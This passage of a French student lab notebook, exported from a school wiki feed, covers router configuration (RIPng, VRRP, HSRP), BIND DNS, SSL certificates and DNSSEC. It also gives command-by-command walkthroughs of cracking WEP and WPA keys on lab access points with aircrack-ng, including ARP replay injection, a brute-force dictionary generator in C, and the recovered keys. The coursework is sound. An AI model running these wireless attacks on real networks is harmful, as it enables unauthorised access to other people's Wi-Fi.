Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier 000-speedflash.space-ssl.conf afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35257</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35257"/>
				<updated>2016-11-18T12:38:10Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Configuration DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
